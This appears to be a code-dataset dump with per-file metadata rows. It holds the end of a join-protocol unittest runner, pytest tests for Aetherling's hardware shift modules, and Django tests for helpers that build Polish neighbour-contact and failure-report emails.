             'testJoinerNonVacuousPendingPendNewKind',
             'testJoinerNonVacuousPendingPendNewRha',
             'testJoinerNonVacuousPendingPendNewFuid',
             'testJoinerNonVacuousPendingPendNewRole',
             'testJoinerNonVacuousPendingPendSameAll',
             'testJoinerVacuousImmutableRefuseRenew',
             'testJoinentNonMainRejectJoin',
             'testJoinentJoinRenameRemoteFail',
             'testJoinentJoinRejectNameConflict',
             'testJoinerAcceptRejectNameConflict',
             'testJoinerAcceptRejectRenameFail',
             'testJoinerAcceptErrorParseInner',
             'testJoinerAcceptMissingName',
             'testJoinerAcceptMissingMode',
             'testJoinerAcceptMissingKind',
             'testJoinerAcceptMissingUid',
             'testJoinerAcceptMissingVerhex',
             'testJoinerAcceptMissingPubhex',
             'testJoinerAcceptMissingRole',
             'testVacuousJoinerAcceptConflictNames',
             'testVacuousJoinerAcceptRenameFail',
             'testJoinerPendErrorParseInner',
             'testJoinerNackErrorPack',
             'testJoinerNackIncorrectPacketKind',
             'testJoinerAckPendErrorPack',
             'testJoinerAckAcceptErrorPack',
             'testJoinerAckAcceptCascade',
             'testJoinerRefuseErrorParseInner',
             'testJoinerRejectErrorParseInner',
             'testJoinerClearJoinentNotClear',
             'testJoinerJoinInProcess',
             'testJoinerJoinInvalidKind',
             'testJoinerJoinPackError',
             'testJoinerProcessNoPacketTimeout',
             'testJoinentJoinErrorParseInner',
             'testJoinentJoinMissingName',
             'testJoinentJoinMissingVerhex',
             'testJoinentJoinMissingPubhex',
             'testJoinentJoinMissingRole',
             'testJoinentJoinMissingMode',
             'testJoinentJoinMissingKind',
             'testJoinentJoinDuplicateJoinent',
             'testVacuousJoinentJoinDuplicateNonVacuousJoiner',
             'testNonVacuousJoinentJoinDuplicateVacuousJoiner',
             'testJoinentJoinDuplicateJoinerMatchNames',
             'testVacuousEphemeralJoinentJoinIncorrectRemoteId',
             'testNonVacuousJoinentJoinNoDestinationIdMatch',
             'testJoinentJoinErrorAddRemote',
             'testJoinentReceiveRefuse',
             'testJoinentAckPendErrorPack',
             'testJoinentAckAcceptErrorPack',
             'testJoinentAckAcceptIncorrectKind',
             'testJoinentPendErrorParseInner',
             'testJoinentCompleteErrorParseInner',
             'testJoinentRejectErrorParseInner',
             'testJoinentRefuseErrorParseInner',
             'testJoinentNackErrorPack',
             'testJoinentNackRenew',
             'testJoinentNackUnknown',
             'testFirstJoinRequestDropped',
             'testAllJoinRequestsDropped',
             'testFirstJoinAcceptDropped',
             'testAllJoinAcceptDropped',
             'testFirstJoinAckAcceptDropped',
             'testAllJoinAckAcceptDropped',
             'testFirstJoinRequestDelayed',
             'testAllJoinRequestsDelayed',
             'testFirstJoinAcceptDelayed',
             'testAllJoinAcceptsDelayed',
             'testJoinRequestDuplicated',
             'testJoinAcceptDuplicated',
             'testJoinAckAcceptDuplicated',
             'testJoinerRestartNothingTransmitted',
             'testJoinerRestartRequestTransmitted',
             'testJoinerRestartAckAcceptTransmitted',
             'testJoinentRestartBeforeAck',
             'testJoinentRestartAckSent',
            ]
    tests.extend(map(BasicTestCase, names))
    suite = unittest.TestSuite(tests)
    unittest.TextTestRunner(verbosity=2).run(suite)
def runAll():
    '''
    Run every test method defined on BasicTestCase.
    '''
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(BasicTestCase))
    unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == '__main__' and __package__ is None:
    # Toggle one of the runners below as needed:
    # console.reinit(verbosity=console.Wordage.concise)
    # runAll()  # run all unittests
    runSome()  # only run some
    # runOne('testAllJoinAcceptDropped')
    # runOne('testJoinerAcceptMissingMode')
| 42.892824
| 124
| 0.591889
| 60,485
| 603,116
| 5.867074
| 0.014764
| 0.086313
| 0.033629
| 0.02876
| 0.913563
| 0.905937
| 0.897109
| 0.884034
| 0.876656
| 0.86623
| 0
| 0.008175
| 0.299675
| 603,116
| 14,060
| 125
| 42.895875
| 0.831998
| 0.120813
| 0
| 0.893711
| 0
| 0
| 0.066108
| 0.033148
| 0
| 0
| 0
| 0
| 0.425487
| 1
| 0.021809
| false
| 0.00011
| 0.001872
| 0.00011
| 0.024672
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff65b81221fbb9e35fdd85cf2a5b15c6d1ac9c3d
| 16,706
|
py
|
Python
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 10
|
2018-04-03T01:51:16.000Z
|
2022-02-07T04:27:26.000Z
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 19
|
2018-05-20T00:43:31.000Z
|
2021-03-18T20:36:52.000Z
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 1
|
2018-07-11T23:36:43.000Z
|
2018-07-11T23:36:43.000Z
|
from aetherling.space_time import *
from magma import *
from magma.clock import *
from magma.bitutils import *
from magma.simulator.coreir_simulator import CoreIRSimulator
from magma.scope import Scope
import fault
from aetherling.space_time.type_helpers import flatten
from aetherling.helpers.fault_helpers import compile_and_run, set_nested_port, \
expect_nested_port, print_nested_port, int_to_ignore
import builtins
def test_shift_s():
    """Shift_S over an SSeq: outputs past the shift amount equal earlier inputs."""
    lane_count = 4
    inputs = [2, 5, 3, 8]
    shamt = 2
    st_type = ST_SSeq(lane_count, ST_Int())
    scope = Scope()
    args = ['I', In(st_type.magma_repr()), 'O', Out(st_type.magma_repr())] + ClockInterface(False, False)
    testcircuit = DefineCircuit('Test', *args)
    rshift = DefineShift_S(lane_count, shamt, st_type.t)()
    wire(rshift.I, testcircuit.I)
    wire(testcircuit.O, rshift.O)
    EndCircuit()
    sim = CoreIRSimulator(testcircuit, testcircuit.CLK)
    # drive all lanes, then evaluate combinationally once
    for lane, val in enumerate(inputs):
        sim.set_value(testcircuit.I[lane], int2seq(val, 8), scope)
    sim.evaluate()
    # lane i + shamt must carry what lane i was driven with
    for lane in range(len(inputs) - shamt):
        assert seq2int(sim.get_value(testcircuit.O[lane + shamt])) == inputs[lane]
def test_fault_shift_s():
    """Shift_S with a valid signal, checked through the fault tester."""
    lane_count = 4
    inputs = [2, 5, 3, 8]
    shamt = 2
    st_type = ST_SSeq(lane_count, ST_Int())
    rshift = DefineShift_S(lane_count, shamt, st_type.t, has_valid=True)
    tester = fault.Tester(rshift, rshift.CLK)
    tester.circuit.valid_up = 1
    for lane, val in enumerate(inputs):
        tester.circuit.I[lane] = val
    tester.eval()
    # shifted lanes mirror the earlier inputs; valid propagates through
    for lane in range(len(inputs) - shamt):
        tester.circuit.O[lane + shamt].expect(inputs[lane])
    tester.circuit.valid_down.expect(1)
    compile_and_run(tester)
def test_shift_t_v_always_true_no_ce():
    """Shift_T over a fully-valid TSeq (no invalid clocks, no clock enable)."""
    seq_len = 4
    inputs = [2, 5, 3, 8]
    shamt = 1
    st_type = ST_TSeq(seq_len, 0, ST_Int())
    clocks_per_iter = len(inputs)
    iterations = 2
    testcircuit = DefineShift_T(st_type.n, st_type.i, shamt, st_type.t, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    # offset each iteration's values so repeated sequences are distinguishable
    for offset in range(iterations):
        for clk in range(clocks_per_iter):
            tester.circuit.I = inputs[clk] + offset
            tester.eval()
            if clk >= shamt:
                tester.circuit.O.expect(inputs[clk - shamt] + offset)
                tester.circuit.valid_down.expect(1)
            tester.step(2)
    compile_and_run(tester)
def test_shift_t_invalid_v_delayed_true_no_ce():
    """Shift_T with one invalid clock per TSeq and a delayed valid_up, no clock enable."""
    delay = 3
    seq_len = 5
    inputs = [2, 5, 3, 8, 10]
    shamt = 1
    st_type = ST_TSeq(seq_len, 1, ST_Int())
    clocks_per_iter = seq_len
    iterations = 2
    testcircuit = DefineShift_T(st_type.n, st_type.i, shamt, st_type.t, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    # hold valid_up low for `delay` cycles; valid_down must stay low too
    tester.circuit.valid_up = 0
    for _ in range(delay):
        tester.step(2)
        tester.circuit.valid_down.expect(0)
    tester.circuit.valid_up = 1
    for offset in range(iterations):
        for clk in range(clocks_per_iter):
            # clamp the index so the trailing (invalid) clock repeats the last value
            val_idx = min(clk, len(inputs) - 1)
            tester.circuit.I = inputs[val_idx] + offset
            tester.eval()
            if clk >= shamt:
                tester.circuit.O.expect(inputs[val_idx - shamt] + offset)
                tester.circuit.valid_down.expect(1)
            tester.step(2)
    compile_and_run(tester)
def test_shift_t_invalid_v_delayed_true_ce():
    """Shift_T with an invalid clock, delayed valid_up, and clock enable held high."""
    delay = 3
    seq_len = 5
    inputs = [2, 5, 3, 8, 10]
    shamt = 1
    st_type = ST_TSeq(seq_len, 1, ST_Int())
    clocks_per_iter = seq_len + 1
    iterations = 2
    testcircuit = DefineShift_T(st_type.n, st_type.i, shamt, st_type.t, has_ce=True, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.CE = 1
    # hold valid_up low for `delay` cycles; valid_down must stay low too
    tester.circuit.valid_up = 0
    for _ in range(delay):
        tester.step(2)
        tester.circuit.valid_down.expect(0)
    tester.circuit.valid_up = 1
    for offset in range(iterations):
        for clk in range(clocks_per_iter):
            tester.print("CLK: {}\n".format(clk))
            # clamp the index so trailing (invalid) clocks repeat the last value
            val_idx = min(clk, len(inputs) - 1)
            tester.circuit.I = inputs[val_idx] + offset
            tester.eval()
            if clk >= shamt and clk < seq_len:
                tester.circuit.O.expect(inputs[val_idx - shamt] + offset)
                tester.circuit.valid_down.expect(1)
            tester.step(2)
    compile_and_run(tester)
def test_shift_t_elem_invalid_invalid_v_delayed_true_ce():
    """Shift_T over nested TSeqs with invalid clocks at both levels, delayed valid, CE high."""
    delay = 3
    seq_len = 5
    inputs = [2, 5, 3, 8, 10]
    shamt = 1
    outer_inv = 1
    inner_inv = 2
    st_type = ST_TSeq(seq_len, outer_inv, ST_TSeq(1, inner_inv, ST_Int()))
    clocks_per_iter = seq_len + 1
    iterations = 2
    testcircuit = DefineShift_T(st_type.n, st_type.i, shamt, st_type.t, has_ce=True, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.CE = 1
    # hold valid_up low for `delay` cycles; valid_down must stay low too
    tester.circuit.valid_up = 0
    for _ in range(delay):
        tester.step(2)
        tester.circuit.valid_down.expect(0)
    tester.circuit.valid_up = 1
    for offset in range(iterations):
        for clk_outer in range(clocks_per_iter):
            for clk_inner in range(1 + inner_inv):
                tester.print("clk_outer: {}\n".format(clk_outer))
                tester.print("clk_inner: {}\n".format(clk_inner))
                # clamp the index so trailing (invalid) clocks repeat the last value
                val_idx = min(clk_outer, len(inputs) - 1)
                # perturb the input on invalid inner clocks; it must be ignored
                tester.circuit.I = inputs[val_idx] + offset + (0 if clk_inner == 0 else 32)
                tester.eval()
                if clk_outer >= shamt and clk_outer < seq_len and clk_inner == 0:
                    tester.circuit.O.expect(inputs[val_idx - shamt] + offset)
                    tester.circuit.valid_down.expect(1)
                tester.step(2)
    compile_and_run(tester)
def test_shift_t_two_elem_and_invalid_invalid_v_delayed_true_ce():
    """Shift_T over TSeq of 2-element inner TSeqs with invalid clocks, delayed valid, CE high."""
    delay = 3
    seq_len = 5
    inputs = [2, 1, 5, 4, 3, 6, 8, 7, 10, 9]
    shamt = 1
    outer_inv = 1
    inner_inv = 1
    st_type = ST_TSeq(seq_len, outer_inv, ST_TSeq(2, inner_inv, ST_Int()))
    clocks_per_iter = seq_len + 1
    iterations = 2
    testcircuit = DefineShift_T(st_type.n, st_type.i, shamt, st_type.t, has_ce=True, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.CE = 1
    # hold valid_up low for `delay` cycles; valid_down must stay low too
    tester.circuit.valid_up = 0
    for _ in range(delay):
        tester.step(2)
        tester.circuit.valid_down.expect(0)
    tester.circuit.valid_up = 1
    for offset in range(iterations):
        for clk_outer in range(clocks_per_iter):
            for clk_inner in range(2 + inner_inv):
                tester.print("clk_outer: {}\n".format(clk_outer))
                tester.print("clk_inner: {}\n".format(clk_inner))
                # two elements per outer clock; clamp so invalid clocks repeat the last value
                val_idx = min(clk_outer * 2 + clk_inner, len(inputs) - 1)
                # perturb the input on invalid inner clocks; it must be ignored
                tester.circuit.I = inputs[val_idx] + offset + (0 if clk_inner < 2 else 32)
                tester.eval()
                if clk_outer >= shamt and clk_outer < seq_len and clk_inner < 2:
                    # shifting one outer slot moves the flattened index by two
                    tester.circuit.O.expect(inputs[val_idx - shamt * 2] + offset)
                    tester.circuit.valid_down.expect(1)
                tester.step(2)
    compile_and_run(tester)
def test_shift_tt_v_always_true_no_ce():
    """Shift_TT over nested, fully-valid TSeqs (no invalid clocks, no clock enable)."""
    dims = [3, 2]
    inputs = [2, 5, 7, 3, 8, 9]
    shamt = 1
    st_type = ST_TSeq(dims[0], 0, ST_TSeq(dims[1], 0, ST_Int()))
    clocks_per_iter = len(inputs)
    iterations = 2
    testcircuit = DefineShift_TT(st_type.n, st_type.t.n, st_type.i, st_type.t.i, shamt, st_type.t.t, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for offset in range(iterations):
        for clk in range(clocks_per_iter):
            tester.print("CLK: {}\n".format(clk))
            tester.circuit.I = inputs[clk] + offset
            tester.eval()
            if clk >= shamt:
                tester.circuit.O.expect(inputs[clk - shamt] + offset)
                tester.circuit.valid_down.expect(1)
            tester.step(2)
    compile_and_run(tester)
def test_shift_tt_inner_invalid_v_always_true_no_ce():
    """Shift_TT where the inner TSeq carries ii trailing invalid clocks.

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    num_in = [3,2]
    test_vals = [2,5,7,3,8,9]
    shift_amount = 1
    ii = 2  # invalid clocks appended to each inner TSeq period
    in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], ii, ST_Int()))
    num_iterations = 2
    testcircuit = DefineShift_TT(in_type.n, in_type.t.n, in_type.i, in_type.t.i, shift_amount, in_type.t.t, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for i in range(num_iterations):
        for clk_outer in range(num_in[0]):
            for clk_inner in range(num_in[1] + ii):
                tester.print("clk_outer: {}\n".format(clk_outer))
                tester.print("clk_inner: {}\n".format(clk_inner))
                # Flattened index; invalid inner clocks clamp to last element.
                val_idx = clk_outer * 2 + min(clk_inner, num_in[1] - 1)
                # Garbage (+32) is driven during invalid inner clocks.
                in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 else 32)
                tester.circuit.I = in_val
                tester.print("I: {}\n".format(str(in_val)))
                tester.eval()
                tester.print("O: %d\n", tester.circuit.O)
                #tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
                # Check outputs only on valid inner clocks after the shift.
                if val_idx >= shift_amount and clk_inner < 2:
                    tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
                    tester.circuit.valid_down.expect(1)
                tester.step(2)
    compile_and_run(tester)
def test_shift_tt_inner_invalid_elem_invalid_v_always_true_no_ce():
    """Shift_TT where both the inner TSeq and the element-level TSeq(1, iii)
    carry invalid clocks.

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    num_in = [3,2]
    test_vals = [2,5,7,3,8,9]
    shift_amount = 1
    ii = 2   # invalid clocks on the inner TSeq
    iii = 2  # invalid clocks on the innermost (element) TSeq
    in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], ii, ST_TSeq(1, iii, ST_Int())))
    num_iterations = 2
    testcircuit = DefineShift_TT(in_type.n, in_type.t.n, in_type.i, in_type.t.i, shift_amount, in_type.t.t, has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for i in range(num_iterations):
        for clk_outer in range(num_in[0]):
            for clk_inner in range(num_in[1] + ii):
                # 1 valid + iii invalid clocks per element.
                for clk_innermost in range(0,3):
                    tester.print("clk_outer: {}\n".format(clk_outer))
                    tester.print("clk_inner: {}\n".format(clk_inner))
                    tester.print("clk_innermost: {}\n".format(clk_innermost))
                    val_idx = clk_outer * 2 + min(clk_inner, num_in[1] - 1)
                    # Garbage (+32) on every invalid clock at either level.
                    in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_innermost == 0 else 32)
                    tester.circuit.I = in_val
                    tester.print("I: {}\n".format(str(in_val)))
                    tester.eval()
                    tester.print("O: %d\n", tester.circuit.O)
                    #tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
                    # Only the single valid innermost clock is checked.
                    if val_idx >= shift_amount and clk_inner < 2 and clk_innermost == 0:
                        tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
                        tester.circuit.valid_down.expect(1)
                    tester.step(2)
    compile_and_run(tester)
def test_shift_tn_v_always_true_no_ce():
    """Shift_TN over a 3-deep, fully valid TSeq nest; valid_up always high.

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    num_in = [3,2,2]
    test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
    shift_amount = 1
    in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], 0, ST_TSeq(num_in[2], 0, ST_Int())))
    num_clocks_per_iteration = len(test_vals)
    num_iterations = 2
    testcircuit = DefineShift_TN(in_type.n, (2,2), in_type.i, (0,0), shift_amount, ST_Int(), has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for i in range(num_iterations):
        for clk in range(num_clocks_per_iteration):
            tester.print("CLK: {}\n".format(clk))
            tester.circuit.I = test_vals[clk] + i
            tester.eval()
            # Output is the input from shift_amount clocks earlier.
            if clk >= shift_amount:
                tester.circuit.O.expect(test_vals[clk - shift_amount] + i)
                tester.circuit.valid_down.expect(1)
            tester.step(2)
    compile_and_run(tester)
def test_shift_tn_inner_invalid_v_always_true_no_ce():
    """Shift_TN where the two inner TSeq levels carry invalid clocks iis.

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    num_in = [3,2,2]
    test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
    shift_amount = 1
    iis = (2,1)  # invalid clocks for the middle and innermost TSeq levels
    in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], iis[0], ST_TSeq(num_in[2], iis[1], ST_Int())))
    num_iterations = 2
    testcircuit = DefineShift_TN(in_type.n, (2,2), in_type.i, iis, shift_amount, ST_Int(), has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for i in range(num_iterations):
        for clk_outer in range(num_in[0]):
            for clk_inner in range(num_in[1] + iis[0]):
                for clk_ii in range(num_in[2] + iis[1]):
                    tester.print("clk_outer: {}\n".format(clk_outer))
                    tester.print("clk_inner: {}\n".format(clk_inner))
                    tester.print("clk_ii: {}\n".format(clk_ii))
                    # Flattened index; invalid clocks clamp to last element.
                    val_idx = clk_outer * 4 + min(clk_inner, num_in[1] - 1) * 2 + min(clk_ii, num_in[2] - 1)
                    # Garbage (+110) driven during invalid clocks.
                    in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_ii < 2 else 110)
                    tester.circuit.I = in_val
                    tester.print("I: {}\n".format(str(in_val)))
                    tester.eval()
                    tester.print("O: %d\n", tester.circuit.O)
                    #tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
                    # Check only fully valid clocks after the shift window.
                    if val_idx >= shift_amount and clk_inner < 2 and clk_ii < 2:
                        tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
                        tester.circuit.valid_down.expect(1)
                    tester.step(2)
    compile_and_run(tester)
def test_shift_tn_inner_invalid_elem_invalid_v_always_true_no_ce():
    """Shift_TN with invalid clocks on the two inner TSeq levels AND on the
    element type itself (TSeq(1, 2, Int)).

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    num_in = [3,2,2]
    test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
    shift_amount = 1
    iis = (2,1)  # invalid clocks for the middle and innermost TSeq levels
    num_iterations = 2
    testcircuit = DefineShift_TN(num_in[0], (2,2), 0, iis, shift_amount, ST_TSeq(1, 2, ST_Int()), has_valid=True)
    tester = fault.Tester(testcircuit, testcircuit.CLK)
    tester.circuit.valid_up = 1
    for i in range(num_iterations):
        for clk_outer in range(num_in[0]):
            for clk_inner in range(num_in[1] + iis[0]):
                for clk_ii in range(num_in[2] + iis[1]):
                    # 1 valid + 2 invalid clocks per element.
                    for clk_innermost in range(0, 3):
                        tester.print("clk_outer: {}\n".format(clk_outer))
                        tester.print("clk_inner: {}\n".format(clk_inner))
                        tester.print("clk_ii: {}\n".format(clk_ii))
                        # Flattened index; invalid clocks clamp to last element.
                        val_idx = clk_outer * 4 + min(clk_inner, num_in[1] - 1) * 2 + min(clk_ii, num_in[2] - 1)
                        # Garbage (+110) driven on any invalid clock.
                        in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_ii < 2 and clk_innermost == 0 else 110)
                        tester.circuit.I = in_val
                        tester.print("I: {}\n".format(str(in_val)))
                        tester.eval()
                        tester.print("O: %d\n", tester.circuit.O)
                        #tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
                        # Only fully valid clocks after the shift are checked.
                        if val_idx >= shift_amount and clk_inner < 2 and clk_ii < 2 and clk_innermost == 0:
                            tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
                            tester.circuit.valid_down.expect(1)
                        tester.step(2)
    compile_and_run(tester)
def test_shift_ts():
    """Shift_TS: shift across a TSeq of SSeqs; the first shift_amount output
    elements are don't-cares (int_to_ignore).

    NOTE(review): indentation reconstructed — original whitespace was lost.
    """
    no = 2  # outer TSeq length
    io = 0  # outer TSeq invalid clocks
    ni = 4  # inner SSeq width
    test_vals = [[0,1,2,3], [4,5,6,7]]
    # Expected outputs: flat stream shifted right by shift_amount, with the
    # first shift_amount slots unchecked.
    shifted_test_vals = [[int_to_ignore, int_to_ignore, 0, 1], [2, 3, 4, 5]]
    shift_amount = 2
    in_type = ST_TSeq(no, io, ST_SSeq(ni, ST_Int()))
    rshift = DefineShift_TS(no, io, ni, shift_amount, in_type.t.t, has_valid=True)
    tester = fault.Tester(rshift, rshift.CLK)
    tester.circuit.valid_up = 1
    for clk in range(len(test_vals)):
        tester.print("clk: {}".format(clk))
        set_nested_port(tester, tester.circuit.I, test_vals[clk], 1, 0)
        print_nested_port(tester, tester.circuit.I, 1)
        tester.print("\n")
        tester.eval()
        #for i, val in enumerate(test_vals[i*ni+shift_amount:(i+1)*ni+shift_amount]):
        print_nested_port(tester, tester.circuit.O, 1)
        tester.print("\n")
        expect_nested_port(tester, tester.circuit.O, shifted_test_vals[clk], 1, 0)
        tester.circuit.valid_down.expect(1)
        tester.step(2)
    compile_and_run(tester)
| 40.255422
| 125
| 0.613911
| 2,571
| 16,706
| 3.720342
| 0.047063
| 0.099216
| 0.063983
| 0.0207
| 0.88897
| 0.884684
| 0.858233
| 0.846837
| 0.843387
| 0.825196
| 0
| 0.027672
| 0.264516
| 16,706
| 414
| 126
| 40.352657
| 0.750794
| 0.019155
| 0
| 0.754986
| 0
| 0
| 0.019718
| 0
| 0
| 0
| 0
| 0
| 0.002849
| 1
| 0.039886
| false
| 0
| 0.02849
| 0
| 0.068376
| 0.091168
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
444a67f9fa72370d6eff0df38123a305ac00c1c5
| 4,611
|
py
|
Python
|
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | 1
|
2022-02-15T13:36:29.000Z
|
2022-02-15T13:36:29.000Z
|
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | null | null | null |
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | null | null | null |
import pytest
from User.user_helper_functions import create_email_subject_neighbour, create_email_subject_failure, \
create_email_message_neighbour, create_email_message_failure
def test_email_create_neighbour_subject():
    """The neighbour-contact subject embeds full name and username."""
    subject = create_email_subject_neighbour('John', 'Smith', 'John1908')
    assert subject == 'Prośba o kontakt od użytkownika John Smith (John1908)'
def test_email_create_neighbour_subject_with_incorrect_data():
    """A None first name must raise ValueError mentioning user data."""
    with pytest.raises(ValueError) as context:
        create_email_subject_neighbour(None, 'Smith', 'John1908')
    assert 'Wrong user data' in str(context.value)
def test_email_create_failure_subject():
    """The failure-report subject combines building and failure type."""
    subject = create_email_subject_failure('Sesame Street 103', 'Zalanie')
    assert subject == 'Zgłoszenie awarii - Sesame Street 103 - Zalanie'
def test_email_create_failure_subject_with_incorrect_data():
    """A None building must raise ValueError mentioning building data."""
    with pytest.raises(ValueError) as context:
        create_email_subject_failure(None, 'Zalanie')
    assert 'Wrong building data' in str(context.value)
def test_email_create_neighbour_message():
    """With contact_flag=True the neighbour message includes the phone number.

    The expected body shows the helper title-cases the lowercase input names
    ('kermit defrog' -> 'Kermit Defrog').
    """
    flat = 'Sesame Street 103/3'
    phone = 89175852986
    email = 'kermit@hotmail.com'
    first_name = 'kermit'
    last_name = 'defrog'
    contact_flag = True
    message = create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
    correct_message = """Witam,
Jestem Państwa sąsiadem z mieszkania Sesame Street 103/3.
Bardzo proszę o kontakt pod poniższym numerem telefonu lub przez pocztę elektroniczną:
Telefon: 89175852986
Email: kermit@hotmail.com
Z góry dziękuję i pozdrawiam,
Kermit Defrog
"""
    assert correct_message == message
def test_email_create_neighbour_message_flag_false():
    """With contact_flag=False the phone number is replaced by a
    'no consent to share the phone number' notice."""
    flat = 'Sesame Street 103/3'
    phone = 89175852986
    email = 'kermit@hotmail.com'
    first_name = 'kermit'
    last_name = 'defrog'
    contact_flag = False
    message = create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
    correct_message = """Witam,
Jestem Państwa sąsiadem z mieszkania Sesame Street 103/3.
Bardzo proszę o kontakt pod poniższym numerem telefonu lub przez pocztę elektroniczną:
Telefon: Użytkownik nie wyraził zgody na udostępnienie nr telefonu
Email: kermit@hotmail.com
Z góry dziękuję i pozdrawiam,
Kermit Defrog
"""
    assert correct_message == message
def test_email_create_neighbour_message_with_incorrect_data():
    """A None email must make create_email_message_neighbour raise ValueError.

    The original test also built an expected-message literal that was never
    used — the call is expected to raise before any comparison could happen —
    so that dead local has been removed.
    """
    flat = 'Sesame Street 103/3'
    phone = 89175852986
    email = None
    first_name = 'kermit'
    last_name = 'defrog'
    contact_flag = True
    with pytest.raises(ValueError) as context:
        create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
    assert 'Wrong user data' in str(context.value)
def test_email_create_failure_message():
    """The failure-report message lists user, building, flat and failure type."""
    failure_type = 'Zalanie'
    flat = 'Sesame Street 103/3'
    building = 'Sesame Street 103'
    email = 'kermit@hotmail.com'
    first_name = 'kermit'
    last_name = 'defrog'
    username = 'Kermit1999'
    correct_message = """
użytkownik: kermit defrog / kermit@hotmail.com / Kermit1999
budynek: Sesame Street 103
mieszkanie: Sesame Street 103/3
typ awarii: Zalanie
"""
    message = create_email_message_failure(first_name, last_name, email, username, flat, building, failure_type)
    assert correct_message == message
def test_email_create_failure_message_with_incorrect_data():
    """A None username must make create_email_message_failure raise ValueError.

    The original test also built an expected-message literal that was never
    used — the call is expected to raise before any comparison could happen —
    so that dead local has been removed.
    """
    failure_type = 'Zalanie'
    flat = 'Sesame Street 103/3'
    building = 'Sesame Street 103'
    email = 'kermit@hotmail.com'
    first_name = 'kermit'
    last_name = 'defrog'
    username = None
    with pytest.raises(ValueError) as context:
        create_email_message_failure(first_name, last_name, email, username, flat, building, failure_type)
    assert 'Wrong user or building data' in str(context.value)
| 27.777108
| 112
| 0.73303
| 578
| 4,611
| 5.603806
| 0.1609
| 0.059278
| 0.074097
| 0.049398
| 0.846249
| 0.820932
| 0.765051
| 0.765051
| 0.715036
| 0.637234
| 0
| 0.036818
| 0.193017
| 4,611
| 165
| 113
| 27.945455
| 0.833647
| 0
| 0
| 0.723214
| 0
| 0
| 0.363262
| 0
| 0
| 0
| 0
| 0
| 0.080357
| 1
| 0.080357
| false
| 0
| 0.017857
| 0
| 0.098214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
926f51a1ef4a0b61fb6eca53cf53cbe16d3b9e8d
| 20,408
|
py
|
Python
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
